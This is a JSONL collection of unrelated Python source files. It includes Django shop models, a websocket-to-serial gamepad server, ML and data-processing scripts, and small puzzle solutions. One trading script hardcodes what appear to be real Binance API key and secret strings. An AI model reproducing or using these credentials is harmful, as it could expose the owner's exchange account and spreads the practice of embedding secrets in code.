+{"seq_id":"236619258","text":"\"\"\"\nRegular expressions are terrible, tedious, terrible things.\n\"\"\"\nimport re \n\n\ndef like_scanf(s, sep=\"\\s*\"):\n \"\"\" Convert a 'scanf()' style string to a regex \"\"\"\n mapping = \\\n {\n r\"%f\" : r\"[-+]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?\",\n r\"%d\" : r\"[-+]?\\d+\",\n }\n valid = \"|\".join(mapping.keys())\n fmtstr = re.findall(valid, s)\n fmtlst = [mapping[x] for x in fmtstr]\n return sep.join(fmtlst)\n","sub_path":"realtime-graph-follow/webserver/lineparse.py","file_name":"lineparse.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"127169621","text":"from django.shortcuts import render\nfrom .form import ContactForm\nfrom .models import Contact\n# Create your views here.\ndef contact(request):\n form = ContactForm(request.POST or None)\n if form.is_valid():\n obj = Contact.objects.create(**form.cleaned_data)\n print(form.cleaned_data)\n form = ContactForm()\n context = {\n \"title\": \"Contact Us\",\n \"form\": form\n }\n return render(request, \"form.html\",context)","sub_path":"contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"61593064","text":"import pandas as pd\nimport requests\nfrom datetime import datetime\nfrom datetime import timedelta\nimport easygui\nimport time\nfrom binance.client import Client\nimport array\nimport tulipy as ti\n\n\n\n\nclient = Client('1XGCXOq8RCHuKA0O322OHahi0Kg0KsSHsG4ai4Gbp7MmaLFwVEOxGoZ2G1KSjEAS','207ia9nrYf8OF3LDXjMPUShYxEDAQWUwJBxv1wzHUDmswHWlU1udgCHc7xxwyTiK')\ncryptoCount = 1\n\narr = array.array('i',[])\nsmall = 60\nmedium = 540\nlarge = 960\ndef find(total, smallavgPrice = 0, mediumavgPrice = 0, largeavgPrice = 0):\n BTCUSDTPrice = requests.get(\"https://api.binance.com/api/v1/ticker/price?symbol=ALGOBTC\")\n arr.insert(total, int(float(BTCUSDTPrice.json()['price'])))\n count = len(arr)\n if (count > small):\n for i in range(small):\n smallavgPrice = smallavgPrice + arr[count - 1 - i]\n\n #print(\"small: \",smallavgPrice/15)\n if (count > medium):\n for i in range(medium):\n mediumavgPrice = mediumavgPrice + arr[count - 1 - i]\n\n #print(\"medium :\",mediumavgPrice / 30)\n if (count > large):\n for i in range(large):\n largeavgPrice = largeavgPrice + arr[count - 1 - i]\n\n #print(\"large: \",largeavgPrice / 60)\n\n if (smallavgPrice > largeavgPrice and smallavgPrice > mediumavgPrice and count >= medium):\n\n print(\"Buy\")\n elif (cryptoCount > 0 and smallavgPrice <= mediumavgPrice and count >= medium):\n\n print(\"Sell\")\n time.sleep(900)\n find(total + 1)\n\n\nfind(0)\n","sub_path":"Simple Moving Average Method Conintues Data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"601086852","text":"'''\nGiven an unsorted array return whether an increasing subsequence of length 3 exists or not in the array.\n\nFormally the function should:\nReturn true if there exists i, j, k\nsuch that arr[i] < arr[j] < arr[k] given 0 ≤ i < j < k ≤ n-1 else return false.\nYour algorithm should run in O(n) time complexity and O(1) space complexity.\n\nExample\nGiven [1, 2, 3, 4, 5],\nreturn true.\n\nGiven [5, 4, 3, 2, 1],\nreturn false.\n'''\nclass Solution:\n \"\"\"\n @param nums: a list of integers\n @return: return a boolean\n \"\"\"\n #time: O(n), space O(n)\n # def increasingTriplet(self, nums):\n # if len(nums) < 3: return False\n \n # left_min = [0] * len(nums)\n # lmin = nums[0]\n # for i, n in enumerate(nums):\n # lmin = min(lmin, n)\n # left_min[i] = lmin\n \n # right_max = [0] * len(nums)\n # rmax = nums[-1]\n # for i in range(len(nums)-1, -1, -1):\n # rmax = max(nums[i], rmax)\n # right_max[i] = rmax\n \n # for i in range(1, len(nums)-1):\n # if left_min[i-1] < nums[i] < right_max[i+1]: return True\n # return False\n def increasingTriplet(self, nums):\n small = big = float('inf')\n for n in nums:\n if n <= small: small = n\n elif n <= big: big = n\n else: return True\n return False\n","sub_path":"leetcode/increasingTriplet.py","file_name":"increasingTriplet.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"373150875","text":"import sys\n\n\ntest_case = open(sys.argv[1], 'r')\nfor test in test_case:\n line = test.strip().split(' ')\n new_line = ''\n x = int(line[0])\n y = int(line[1])\n n = int(line[2])\n\n for i in range(1, n+1):\n to_append = ''\n if i % x == 0 and i % y == 0:\n to_append = 'FB'\n elif i % x == 0:\n to_append = 'F'\n elif i % y == 0:\n to_append = 'B'\n else:\n to_append = str(i)\n\n new_line = new_line + to_append + ' '\n\n print(new_line.strip())\ntest_case.close()\n\n","sub_path":"solved/fizz_buzz.py","file_name":"fizz_buzz.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"316960344","text":"import utils\nimport classifiers\nimport numpy as np\n\nfilename = '../data/PolySVM_Normalized.txt'\n\ndef get_poly_function(c, d):\n def poly_function(x1, x2):\n value = x1.T @ x2\n value = value + c\n value = value ** d\n return value\n return poly_function\n\nif __name__ == '__main__':\n dataset = utils.load_train_data()\n dataset = utils.normalize(dataset)\n _, folds = utils.kfold(dataset, n=3)\n outfile = open(filename, 'w')\n constants = [.5, 1, 3, 5]\n powers = [1, 2, 3]\n bounds = [.1, .5, 1]\n npca = [11, 10, 9, 8]\n w, v = utils.PCA(dataset)\n\n for power in powers:\n for constant in constants:\n for bound in bounds:\n for n in npca:\n vt = v[:, :n]\n poly_function = get_poly_function(power, constant)\n scores, labels = [], []\n for fold in folds:\n train, test = fold[0], fold[1]\n train, test = np.vstack((vt.T @ train[:-1, :], train[-1])), np.vstack((vt.T @ test[:-1, :], test[-1]))\n fold_labels = test[-1, :]\n labels.append(fold_labels)\n\n alphas = classifiers.DualSVM_Train(train, poly_function, bound=bound)\n train, alphas = utils.support_vectors(train, alphas)\n fold_scores = classifiers.DualSVM_Score(train, poly_function, alphas, test)\n scores.append(fold_scores)\n\n scores = np.concatenate(scores)\n labels = np.concatenate(labels)\n mindcf, optimal_threshold = utils.minDCF(scores, labels, prior_t=.5)\n # Ignore the first field, is just handy for sorting\n print(f\"{mindcf} |.| MinDCF: {mindcf:.4f} - PCA: {n} - Opt. Thr.: {optimal_threshold:.4f} - Power: {power:.4f} - Constant: {constant:.4f} - C: {bound:.4f}\", file=outfile)\n np.save(f'../data/PolySVM-Normalized-PCA{n}-C{constant}-POW{power}Scores.npy', scores)\n\n outfile.close()\n","sub_path":"code/PolySVM_Normalized.py","file_name":"PolySVM_Normalized.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"510805653","text":"#!/usr/bin/env python\n\nimport epitome as epi\n\ndef run(input_name):\n output = 'detrend'\n\n print('\\nAdding detrend module.')\n\n try:\n print('\\nSet detrend order:')\n polort = epi.utilities.selector_int()\n\n # if we messed any of these up, we return None\n except ValueError as ve:\n return '', None\n\n # otherwise we print the command and return it\n line = ('. ${{DIR_PIPE}}/epitome/modules/pre/detrend {input_name} {polort}').format(\n input_name=str(input_name),\n polort=str(polort))\n\n return line, output\n","sub_path":"assets/epitome/151012-spins/epitome/commands/detrend.py","file_name":"detrend.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"33711390","text":"from decimal import Decimal\nimport uuid\n\nfrom django.db import models\nfrom django.db.models import Sum, F\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom django.conf import settings\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom autoslug import AutoSlugField\nfrom filebrowser.fields import FileBrowseField\nfrom polymorphic.models import PolymorphicModel\n\nfrom . import settings as shop_settings\n\n\nPAYMENT_GATEWAYS_CHOICES = tuple(\n (g, shop_settings.SHOP_PAYMENT_GATEWAYS[g]['verbose_name'])\n for g in shop_settings.SHOP_PAYMENT_GATEWAYS\n)\n\n\nPRODUCT_ATTRIBUTE_VALUE_TYPE_CHOICES = (\n ('options', _('Options')),\n ('text', _('Text'))\n)\n\n\nclass Category(MPTTModel):\n title = models.CharField(_('title'), max_length=255)\n slug = AutoSlugField(\n _('slug'), populate_from='title',\n blank=True, editable=True, unique=True\n )\n parent = TreeForeignKey(\n 'self', null=True, blank=True, related_name='children', db_index=True\n )\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n published = models.BooleanField(_('published'), default=True)\n description = models.TextField(_('description'), default='', blank=True)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('category')\n verbose_name_plural = _('categories')\n\n class MPTTMeta:\n order_insertion_by = ('order',)\n\n @staticmethod\n def autocomplete_search_fields():\n return ('id__iexact', 'title__icontains') # nocov\n\n def save(self, *args, **kwargs):\n super(Category, self).save(*args, **kwargs)\n unpublished = Category.objects.filter(published=False)\n unpublished_descendants_pks = []\n for c in unpublished:\n unpublished_descendants_pks += c.get_descendants() \\\n .values_list('pk', flat=True)\n Category.objects.filter(pk__in=unpublished_descendants_pks) \\\n .distinct().update(published=False)\n self.__class__.objects.rebuild()\n\n def __str__(self):\n return ' > '.join(\n a.title for a in self.get_ancestors(include_self=True)\n )\n\n def get_subcategories(self):\n return self.get_children().filter(published=True)\n\n def get_products(self):\n return self.products.filter(published=True)\n\n def get_product_attributes(self):\n return self.product_attributes.filter(published=True)\n\n\nclass TaxRate(models.Model):\n title = models.CharField(_('title'), max_length=255)\n rate = models.DecimalField(\n _('rate [%]'), max_digits=16, decimal_places=4,\n validators=[\n MinValueValidator(Decimal(0)),\n MaxValueValidator(Decimal(100))\n ]\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('title',)\n verbose_name = _('tax rate')\n verbose_name_plural = _('tax rates')\n\n def __str__(self):\n return '{} ({}%)'.format(self.title, self.rate)\n\n\nclass Product(models.Model):\n title = models.CharField(_('title'), max_length=255)\n slug = AutoSlugField(\n _('slug'), populate_from='title',\n blank=True, editable=True, unique=True\n )\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n published = models.BooleanField(_('published'), default=True)\n featured = models.BooleanField(_('featured'), default=False)\n sale = models.BooleanField(_('on sale'), default=False)\n category = models.ForeignKey(\n Category, verbose_name=_('category'), related_name='products'\n )\n\n description = models.TextField(\n 
_('description'), default='', blank=True\n )\n\n attributes = models.ManyToManyField(\n 'ProductAttribute', verbose_name=_('attributes'), blank=True,\n through='ProductAttributeValue'\n )\n\n thumbnail = FileBrowseField(\n _('thumbnail'), max_length=255, blank=True, null=True,\n directory='shop/products', extensions=['.jpg', '.jpeg', '.gif', '.png']\n )\n\n net_price = models.DecimalField(\n _('net price'), max_digits=14, decimal_places=2, blank=True,\n validators=[MinValueValidator(Decimal(0))]\n )\n tax_rate = models.ForeignKey(\n TaxRate, verbose_name=_('tax rate'),\n help_text=_('Leaving this field empty means no tax is applied to net '\n 'price.'),\n null=True, blank=True\n )\n gross_price = models.DecimalField(\n _('gross price'), max_digits=14, decimal_places=2, blank=True,\n validators=[MinValueValidator(Decimal(0))]\n )\n\n stock = models.PositiveIntegerField(_('stock'), default=0, blank=True)\n infinite_stock = models.BooleanField(\n _('infinite stock'),\n help_text=_('Setting this option will make product available to '\n 'purchase regardless of the stock.'),\n default=False\n )\n\n sales_count = models.PositiveIntegerField(\n _('sales count'), default=0, blank=True\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('product')\n verbose_name_plural = _('products')\n\n def __str__(self):\n return self.title\n\n def as_dict(self):\n try:\n image = self.get_first_image_or_thumbnail() \\\n .version_generate('shop_thumbnail').url\n except (AttributeError, FileNotFoundError):\n image = ''\n data = {\n 'pk': self.pk,\n 'url': self.get_url(),\n 'title': self.title,\n 'image': image,\n 'net_price': float(self.net_price),\n 'tax_rate': float(self.get_tax_rate()),\n 'gross_price': float(self.gross_price)\n }\n return data\n\n def get_url(self):\n return reverse('shop:product', kwargs={\n 'category_slug': self.category.slug,\n 'product_slug': self.slug\n })\n\n def get_tax_rate(self):\n try:\n return self.tax_rate.rate\n except AttributeError:\n return 0\n\n def get_images(self):\n return self.images.filter(published=True)\n\n def get_first_image_or_thumbnail(self):\n try:\n return self.thumbnail or self.get_images()[0].image\n except IndexError:\n return None\n\n def is_available(self):\n return bool(self.stock) or self.infinite_stock\n\n def get_categories_breadcrumbs(self):\n return self.category.get_ancestors(include_self=True)\n\n def get_attributes(self):\n return ProductAttributeValue.objects.filter(\n product=self,\n attribute__published=True,\n attribute__categories=self.category\n )\n\n\nclass ProductImage(models.Model):\n product = models.ForeignKey(Product, related_name='images')\n image = FileBrowseField(\n _('image'), max_length=255, directory='shop/products',\n extensions=['.jpg', '.jpeg', '.gif', '.png']\n )\n published = models.BooleanField(_('published'), default=True)\n title = models.CharField(\n _('title'), max_length=255, default='', blank=True\n )\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('image')\n verbose_name_plural = _('images')\n\n\nclass ProductAttribute(models.Model):\n name = models.CharField(_('name'), max_length=255)\n slug = AutoSlugField(\n _('slug'), populate_from='name',\n blank=True, editable=True, unique=True\n )\n published = models.BooleanField(_('published'), default=True)\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n value_type = models.CharField(\n _('value type'), max_length=255,\n 
choices=PRODUCT_ATTRIBUTE_VALUE_TYPE_CHOICES, default='options'\n )\n categories = models.ManyToManyField(\n Category, verbose_name=_('categories'), blank=True,\n related_name='product_attributes'\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('product attribute')\n verbose_name_plural = _('product attributes')\n\n def __str__(self):\n return self.name\n\n def get_options(self):\n return self.options.all()\n\n\nclass ProductAttributeOption(models.Model):\n attribute = models.ForeignKey(\n ProductAttribute, verbose_name=_('attribute'), related_name='options'\n )\n value = models.CharField(_('value'), max_length=255)\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('option')\n verbose_name_plural = _('options')\n\n def __str__(self):\n return self.value\n\n\nclass ProductAttributeValue(models.Model):\n product = models.ForeignKey(Product)\n attribute = models.ForeignKey(ProductAttribute)\n option = models.ForeignKey(ProductAttributeOption, null=True, blank=True)\n text_value = models.CharField(\n _('text value'), max_length=255, null=True, blank=True\n )\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('attribute')\n verbose_name_plural = _('attributes')\n\n def __str__(self):\n return self.attribute.name\n\n def save(self, *args, **kwargs):\n if self.attribute.value_type == 'options':\n self.text_value = None\n elif self.attribute.value_type == 'text':\n self.option = None\n super(ProductAttributeValue, self).save(*args, **kwargs)\n\n def get_value(self):\n if self.attribute.value_type == 'options':\n return self.option.value\n elif self.attribute.value_type == 'text':\n return self.text_value\n\n\nclass DeliveryMethod(models.Model):\n title = models.CharField(\n _('title'), max_length=255, default='', blank=True\n )\n published = models.BooleanField(_('published'), default=True)\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n price = models.DecimalField(\n _('price'), max_digits=14, decimal_places=2,\n validators=[MinValueValidator(Decimal(0))]\n )\n involves_shipping = models.BooleanField(\n _('involves shipping'), default=True\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('delivery method')\n verbose_name_plural = _('delivery methods')\n\n def __str__(self):\n return self.title\n\n def get_payment_methods(self):\n return self.payment_methods.filter(published=True)\n\n def as_dict(self):\n data = {\n 'pk': self.pk,\n 'title': self.title,\n 'price': float(self.price),\n 'involves_shipping': self.involves_shipping,\n 'payment_methods': [\n p.as_dict() for p in self.get_payment_methods()\n ]\n }\n return data\n\n\nclass PaymentMethod(models.Model):\n title = models.CharField(\n _('title'), max_length=255, default='', blank=True\n )\n published = models.BooleanField(_('published'), default=True)\n order = models.PositiveSmallIntegerField(_('shop order'), default=0)\n price = models.DecimalField(\n _('price'), max_digits=14, decimal_places=2,\n validators=[MinValueValidator(Decimal(0))]\n )\n delivery_methods = models.ManyToManyField(\n DeliveryMethod, verbose_name=_('delivery methods'),\n related_name='payment_methods'\n )\n gateway = models.CharField(\n _('gateway'), max_length=255,\n choices=PAYMENT_GATEWAYS_CHOICES, null=True, blank=True\n )\n wait_for_payment = models.BooleanField(_('wait for payment'), 
default=True)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('payment method')\n verbose_name_plural = _('payment methods')\n\n def __str__(self):\n return self.title\n\n def get_shipment_methods(self):\n # the M2M field declared on this model is 'delivery_methods'\n return self.delivery_methods.filter(published=True)\n\n def as_dict(self):\n data = {\n 'pk': self.pk,\n 'title': self.title,\n 'price': float(self.price),\n 'gateway': self.gateway\n }\n return data\n\n def get_gateway_api_url(self):\n try:\n return shop_settings.SHOP_PAYMENT_GATEWAYS[self.gateway]['api_url']\n except AttributeError:\n return None\n\n\nclass Customer(models.Model):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, verbose_name=_('user')\n )\n\n wishlist = models.ManyToManyField(\n Product, verbose_name=_('wishlist'), related_name='wishlists'\n )\n\n class Meta:\n app_label = 'shop'\n verbose_name = _('customer')\n verbose_name_plural = _('customers')\n\n def __str__(self):\n return self.user.username\n\n def get_wishlist(self):\n return self.wishlist.filter(\n published=True,\n category__published=True\n )\n\n def get_orders(self):\n return self.orders.all()\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_user_hook(sender, instance, created, **kwargs):\n if created:\n Customer.objects.get_or_create(user=instance)\n\n\n@receiver(post_delete, sender=Customer)\ndef delete_user_hook(sender, instance, **kwargs):\n instance.user.delete()\n\n\nclass ShopOrder(models.Model):\n order_id = models.UUIDField(\n _('order id'), default=uuid.uuid4, editable=False\n )\n created = models.DateTimeField(\n _('creation date'), auto_now_add=True\n )\n customer = models.ForeignKey(\n Customer, verbose_name=_('customer'), related_name='orders'\n )\n delivery_method = models.ForeignKey(\n DeliveryMethod, verbose_name=_('delivery method')\n )\n payment_method = models.ForeignKey(\n PaymentMethod, verbose_name=_('payment method')\n )\n delivery_address = models.TextField(\n _('delivery address'), default='', blank=True\n )\n invoice_tax_id = models.CharField(\n _('invoice - tax ID'), max_length=255, blank=True, default=''\n )\n invoice_company = models.TextField(\n _('invoice - company name and address'),\n blank=True, default=''\n )\n additional_info = models.TextField(\n _('additional info'), default='', blank=True\n )\n\n status = models.CharField(\n _('status'), max_length=255,\n choices=shop_settings.SHOP_ORDER_STATUSES,\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('-created',)\n verbose_name = _('shop order')\n verbose_name_plural = _('shop orders')\n\n def __str__(self):\n return str(self.order_id)\n\n def get_products(self):\n return self.products.all()\n\n def get_prices(self):\n products = self.get_products().aggregate(\n total=Sum(\n F('gross_price') * F('quantity'),\n output_field=models.DecimalField()\n )\n )\n delivery_price = self.delivery_method.price\n payment_price = self.payment_method.price\n # parenthesize the fallback: 'a or b + c' parses as 'a or (b + c)'\n total = ((products['total'] or Decimal(0)) +\n delivery_price +\n payment_price)\n return {\n 'products': products['total'],\n 'delivery': delivery_price,\n 'payment': payment_price,\n 'total': total\n }\n\n @property\n def invoice(self):\n return bool(self.invoice_tax_id or self.invoice_company)\n\n\nclass ShopOrderProduct(models.Model):\n shop_order = models.ForeignKey(\n ShopOrder, verbose_name=_('shop order'), related_name='products'\n )\n product = models.ForeignKey(Product, verbose_name=_('product'))\n net_price = models.DecimalField(\n _('net price'), max_digits=14, decimal_places=2,\n 
validators=[MinValueValidator(Decimal(0))]\n )\n tax_rate = models.ForeignKey(\n TaxRate, verbose_name=_('tax rate'), null=True, blank=True\n )\n gross_price = models.DecimalField(\n _('gross price'), max_digits=14, decimal_places=2,\n validators=[MinValueValidator(Decimal(0))]\n )\n quantity = models.PositiveIntegerField(_('quantity'))\n\n class Meta:\n app_label = 'shop'\n verbose_name = _('product')\n verbose_name_plural = _('products')\n\n def __str__(self):\n return self.product.title\n\n def get_subtotal(self):\n return self.gross_price * self.quantity\n\n\nclass ShopOrderPayment(PolymorphicModel):\n shop_order = models.ForeignKey(\n ShopOrder, verbose_name=_('shop order'), related_name='payments'\n )\n\n class Meta:\n app_label = 'shop'\n verbose_name = _('payment')\n verbose_name_plural = _('payments')\n\n\nclass GenericPayment(ShopOrderPayment):\n amount = models.DecimalField(\n _('amount'), max_digits=14, decimal_places=2,\n validators=[MinValueValidator(Decimal(0))]\n )\n date = models.DateTimeField(_('date'))\n\n class Meta:\n app_label = 'shop'\n verbose_name = _('payment')\n verbose_name_plural = _('payments')\n\n def get_amount(self):\n return self.amount\n\n def get_date(self):\n return self.date\n","sub_path":"shop/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
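A minimal sketch of the operator-precedence pitfall fixed in ShopOrder.get_prices above: `a or b + c` parses as `a or (b + c)`, so the delivery and payment prices were silently dropped whenever the products total was truthy. The values below are illustrative:

from decimal import Decimal

products_total = Decimal('10')
delivery, payment = Decimal('3'), Decimal('2')
wrong = products_total or Decimal(0) + delivery + payment    # -> Decimal('10')
right = (products_total or Decimal(0)) + delivery + payment  # -> Decimal('15')
assert (wrong, right) == (Decimal('10'), Decimal('15'))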
+{"seq_id":"465671458","text":"import asyncio\nimport websockets\nimport serial\nimport time\nfrom pathlib import Path\n\nTIME_FORMAT = \"[%Y-%m-%d %H:%M:%S]\"\n\nclass WSServer:\n def __init__(self, queue, base_port):\n self.message_queue = queue\n self.base_port = base_port\n\n async def on_receive(self, websocket, path):\n server_port = websocket.local_address[1]\n try:\n async for message in websocket:\n print(time.strftime(TIME_FORMAT), server_port, \"received from\", websocket.remote_address[0], \"0x\" + message.hex())\n\n # Append the received message to the queue\n await self.message_queue.put((server_port, message))\n\n await websocket.send(message)\n except Exception as e:\n print(time.strftime(TIME_FORMAT), server_port, \"Unexpected connection close\", )\n print(time.strftime(TIME_FORMAT), server_port, \"Issuing disconnect\", )\n await self.message_queue.put((server_port, (server_port - self.base_port).to_bytes(1, 'little') + b\"\\x01\\x00\\x00\"))\n\n def start(self, num_controllers):\n for i in range(num_controllers):\n print(time.strftime(TIME_FORMAT), \"Starting server on port\", i + self.base_port)\n asyncio.get_event_loop().run_until_complete(websockets.serve(self.on_receive, \"\", i + self.base_port))\n print(time.strftime(TIME_FORMAT), \"Server started\")\n\n# Consumes arriving messages queue. This serializes message handling independent\n# of the server threads, to avoid races over the serial output\nasync def queue_handler(queue, serial_port, baud=115200):\n print(time.strftime(TIME_FORMAT), \"queue_handler started\")\n with serial.Serial(serial_port, 115200, timeout=1) as ser:\n while True:\n index, message = await queue.get()\n # print(\"Dequeued message\", message, \"for index\", index)\n ser.write(message)\n queue.task_done()\n\nasync def dummy_queue_handler(queue):\n print(time.strftime(TIME_FORMAT), \"queue_handler started\")\n while True:\n index, message = await queue.get()\n print(time.strftime(TIME_FORMAT), \"Dequeued message\", \"0x\" + message.hex(), \"for index\", index)\n queue.task_done()\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='Run server for Remote USB Gamepad bridge')\n parser.add_argument('--num-controllers', type=int, default=2, help='Number of controllers to listen for')\n parser.add_argument('--base-port', '-p', type=int, default=8000, help='Base port number for 0th controller. Other controllers will have servers attached to port base+id')\n parser.add_argument('--baud', type=int, default=115200, help='Serial port baud rate')\n parser.add_argument('--dummy-serial', action=\"store_true\", help='Use dummy handler instead of real serial port')\n parser.add_argument('serial_port', help=\"Serial port to output commands\")\n\n args = parser.parse_args()\n\n queue = asyncio.Queue()\n \n server = WSServer(queue, args.base_port)\n server.start(args.num_controllers)\n\n if args.dummy_serial:\n asyncio.get_event_loop().run_until_complete(dummy_queue_handler(queue))\n else:\n asyncio.get_event_loop().run_until_complete(queue_handler(queue, args.serial_port, args.baud))\n asyncio.get_event_loop().run_forever()\n","sub_path":"server/gamepad_bridge_server.py","file_name":"gamepad_bridge_server.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636634538","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pandas as pd\r\n \r\n \r\n# 需要读取广告操作数据集中的广告ID并将其转化成list\r\nAd_operation = pd.read_csv('/cos_person/tencent/train/Ad_Operation_Data.csv')\r\nAd_op_id = Ad_operation['ad_id'].drop_duplicates(keep='first', inplace=False)\r\nlist_Ad_op_id = list(Ad_op_id)\r\n\r\nuser_feature = pd.read_csv('/cos_person/tencent/train/userFeature.csv')\r\nuser_id = user_feature['user_id'].drop_duplicates(keep='first', inplace=False)\r\nlist_user_id = list(user_id)\r\n \r\n# 定义曝光日志中的相关列\r\nExposure_Log_Data = []\r\n\r\nfor j in range(10,23):\r\n with open('/cos_public/cephfs/tesla_common/deeplearning/dataset/AI_Race/track_log/track_log_201904' + str(j) + '.out', 'r') as f:\r\n for i, line in enumerate(f):\r\n line = line.strip().split('\\t')\r\n \r\n flag_line = line\r\n \r\n if (i % 5000000) == 0:\r\n print(\"*******run \", i)\r\n \r\n if line[0] == '0' or line[1] == '0' or line[2] == '0' or line[3] == '0' or line[4] == '0':\r\n continue\r\n \r\n if ',' in line[2]:\r\n continue\r\n \r\n tmp_user_id = int(line[2]) ##不在用户特征集中的曝光\r\n if tmp_user_id not in list_user_id:\r\n continue\r\n \r\n if '.' in line[0]:\r\n continue\r\n if '.' in line[3]:\r\n continue\r\n \r\n ad_list = []\r\n ad_list_columns = ['ad_id', 'bid', 'pctr', 'quality_ecpm', 'totalEcpm', \r\n 'filter', 'label']\r\n ad_list.append(ad_list_columns)\r\n \r\n tmp_line = line[4].strip().split(';')\r\n \r\n for each in tmp_line:\r\n save_line = []\r\n each_list = each.split(',')\r\n if each_list[6] != '1':\r\n continue\r\n else:\r\n if int(each_list[0]) not in list_Ad_op_id:\r\n continue;\r\n else: \r\n line.append(int(each_list[0]))\r\n line.append(int(each_list[1]))\r\n line.append(float(each_list[2]))\r\n line.append(float(each_list[3]))\r\n line.append(float(each_list[4]))\r\n line.append(int(each_list[5]))\r\n line.append(int(each_list[6]))\r\n save_line.append(line[5])\r\n if save_line:\r\n Exposure_Log_Data.append(line)\r\n line = flag_line\r\n \r\nExposure_Log_Data = pd.DataFrame(Exposure_Log_Data) \r\nExposure_Log_Data_columns = ['Ad_Request_id', 'Ad_Request_Time','user_id',\r\n 'Ad_pos_id', 'ad_list',\r\n 'ad_id','ad_bid','pctr',\r\n 'quality_ecpm', 'totalEcpm',\r\n 'filter', 'label']\r\nExposure_Log_Data.columns = Exposure_Log_Data_columns \r\nExposure_Log_Data.to_csv('/cos_person/tencent/train/Total_Exposure_Log_Data_with_AD_list.csv', index=False,header=None)\r\n\r\nExposure_Log_Data.drop(Exposure_Log_Data.columns[['ad_list']], axis=1,inplace=True)\r\nExposure_Log_Data.to_csv('/cos_person/tencent/train/Train_Log_Data.csv', index=False,header=None)","sub_path":"(修改)处理曝光文件.py","file_name":"(修改)处理曝光文件.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"511286154","text":"\nclass ECSystemParameters:\n \"\"\"\n This class governs all the parameters needed to run our EC System.\n Initially set to invalid values to prevent system for running.\n\n Generation size => How many Individuals do we want in each generation?\n Genome size => We can cap the length for how long we want our initial\n population's expressions to be\n X-Training Data => The x value we will plug into our random expressions\n Y-Training Data => The y values we will match our output to to determine fitness\n Fitness Threshold => What percentage of the population will be selected to\n go on to the next generation\n Stagnation Threshold => If our fitness is not improving overall over this set\n number of generations, we reboot the system and start over\n Mutation Percentage => Of the Individuals selected for the next generation, what\n percentage will we mutate instead of crossover\n Success Threshold => Determines when we have found an equivalent expression. Their\n fitness is at or below this value.\n \"\"\"\n\n def __init__(self):\n self.generation_size = 0\n self.genome_size = 0\n self.x_training_data = []\n self.y_training_data = []\n self.fitness_threshold = -1.0\n self.stagnation_threshold = -1\n self.mutation_percentage = -1.0\n self.success_threshold = -1.0\n\n def all_parameters_set(self):\n \"\"\"\n Make sure that all values are appropriately set\n :return: Boolean true if system is ready, false otherwise\n \"\"\"\n return self.generation_size > 49 and self.genome_size > 4 and self._valid_training_data() \\\n and self.fitness_threshold > 0.0 and self.stagnation_threshold > 0 \\\n and self.mutation_percentage >= 0.0 and self.success_threshold >= 0.0\n\n def _valid_training_data(self):\n \"\"\"\n Make sure our training data exists and that we have a x for every y\n :return: Boolean true if valid data, false othewise\n \"\"\"\n return len(self.x_training_data) > 0 and len(self.x_training_data) == len(self.y_training_data)\n","sub_path":"src/ecSystem/ECSystemParameters.py","file_name":"ECSystemParameters.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
